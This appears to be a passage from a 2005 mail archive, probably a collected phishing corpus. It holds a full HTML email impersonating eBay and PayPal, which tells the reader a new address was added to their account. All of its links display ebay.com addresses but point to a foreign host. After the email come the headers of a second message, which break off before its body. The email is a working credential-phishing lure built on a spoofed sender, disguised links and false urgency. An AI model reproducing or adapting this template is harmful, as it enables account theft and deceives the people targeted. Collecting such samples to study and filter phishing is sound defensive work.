From: "eBay" <accounts@eBay.com>
Content-Type: text/html
X-Spam-Status: No, score=1.9 required=4.1 tests=FORGED_RCVD_HELO,HTML_40_50,
	HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HEADER_CTYPE_ONLY,
	MIME_HTML_ONLY autolearn=no version=3.0.0
X-Spam-Level: *
X-Spam-Checker-Version: SpamAssassin 3.0.0 (2004-09-13) on mail.angelar.com
X-Virus-Scanned: Symantec AntiVirus Scan Engine
Status: O
X-Status: 
X-Keywords:                  
X-UID: 49

<DIV><DIV id=message><TT style="FONT-SIZE: x-small;
FONT-FAMILY:'couriernew',monospace">You have added <A
href="http://unix-web.triton.net/~nick/.eBay/index.htm"
target=_blank>phoneseller@yahoo.com </A>as a new email address for your eBay
account.<BR><BR>If you did not authorize this change or if you need assistance
with your account, please contact eBay customer service  at:&nbsp;</TT>
<P><TT style="FONT-SIZE: x-small; FONT-FAMILY: 'couriernew',monospace"><A
href="http://unix-web.triton.net/~nick/.eBay/index.htm" target=_blank>http://scgi.ebay.com/verify_id=ebay</A><BR><BR><BR>Thank you for using eBay!<BR>The PayPal Team<BR><BR><BR>Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your eBay account and choose the<BR>"Help" link in the header of any page.<BR><BR>----------------------------------------------------------------<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
PROTECT YOUR PASSWORD<BR><BR>&nbsp;&nbsp; NEVER give your password to anyone
and ONLY log in at <A href="http://unix-web.triton.net/~nick/.eBay/index.htm" target=_blank>http://scgi.ebay.com/verify_id=ebay.</A> Protect yourself against fraudulent websites by opening a new web browser (e.g. Internet Explorer or Netscape) and typing in the eBay URL every time you log in to your account.<BR><BR><BR> ---------------------------------------------------------------&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR><BR></B>eBay Email ID PP007</TT></P></DIV></DIV>

From jeremy@angelar.com  Thu Jun 23 17:52:30 2005
Return-Path: <jeremy@angelar.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 35FA3536E93
	for <jose@login.monkey.org>; Thu, 23 Jun 2005 17:52:30 -0400 (EDT)
Received: from ms-smtp-03.rdc-kc.rr.com (ms-smtp-03.rdc-kc.rr.com [24.94.166.129])
	by mail1.monkey.org (Postfix) with ESMTP id 42F0A85AB6F
	for <jose@monkey.org>; Thu, 23 Jun 2005 17:52:29 -0400 (EDT)
Received: from angelar.com (CPE-24-163-222-21.mn.res.rr.com [24.163.222.21])
	by ms-smtp-03.rdc-kc.rr.com (8.12.10/8.12.7) with ESMTP id j5NLqPgu019442
	for <jose@monkey.org>; Thu, 23 Jun 2005 16:52:25 -0500 (CDT)
Received: from mail.angelar.com (eva [127.0.0.1])
	by angelar.com (8.13.1/8.13.1) with ESMTP id j5NLqLpC021902
	for <jose@monkey.org>; Thu, 23 Jun 2005 16:52:23 -0500
Received: (from jeremy@localhost)
	by mail.angelar.com (8.13.1/8.13.1/Submit) id j5NLqLDp021901
	for jose@monkey.org; Thu, 23 Jun 2005 16:52:21 -0500
